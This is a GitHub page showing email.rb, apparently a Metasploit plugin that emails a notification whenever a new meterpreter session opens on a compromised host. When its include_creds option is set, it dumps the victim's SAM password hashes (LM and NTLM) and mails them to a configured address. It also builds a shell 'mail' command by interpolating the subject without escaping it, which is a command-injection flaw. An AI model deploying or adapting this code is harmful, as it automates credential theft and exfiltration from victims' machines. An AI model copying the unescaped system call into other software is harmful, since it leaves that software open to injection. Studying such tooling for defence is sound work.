-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathemail.rb
More file actions
83 lines (63 loc) · 1.72 KB
/
email.rb
File metadata and controls
83 lines (63 loc) · 1.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
require 'tempfile'
module Msf
class Plugin::Email < Msf::Plugin
attr_accessor :email_address, :tmp_file, :include_creds, :send_startup
include Msf::SessionEvent
def collect_credentials(session)
print_status("Collecting credentials for email")
report = ""
# Borrowed from db_credcollect
if (session.type == "meterpreter")
session.core.use("priv")
session.core.use("incognito")
session.priv.sam_hashes.each do |hash|
report << "#{hash.user_name}:#{hash.lanman}:#{hash.ntlm}\n"
end
end
return report
end
def send_email(msg, subject)
begin
tmp_file = Tempfile.open('msf_email')
tmp_file.write(msg)
tmp_file.close
Kernel.system("mail -s '#{subject}' #{self.email_address} < #{tmp_file.path}")
rescue Exception => e
print_error("Sending email notification: #{e.to_s}")
ensure
tmp_file.delete
end
end
def on_plugin_load
if self.send_startup
send_email("Metasploit email notification enabled", "Metasploit started")
end
print_status("Email notification enabled")
end
def on_session_open(session)
subject = "New meterpreter session"
msg = "#{session.tunnel_to_s} via #{session.via_exploit}"
if self.include_creds
msg << "\n\nUser hashes:\n#{collect_credentials(session)}\n"
end
send_email(msg, subject)
end
def initialize(framework, opts)
super
self.email_address = "user@domain"
self.include_creds = false
self.send_startup = true
self.framework.events.add_session_subscriber(self)
self.on_plugin_load
end
def cleanup
self.framework.events.remove_session_subscriber(self)
end
def name
"email notification"
end
def desc
"Send email notifications for any new session"
end
end
end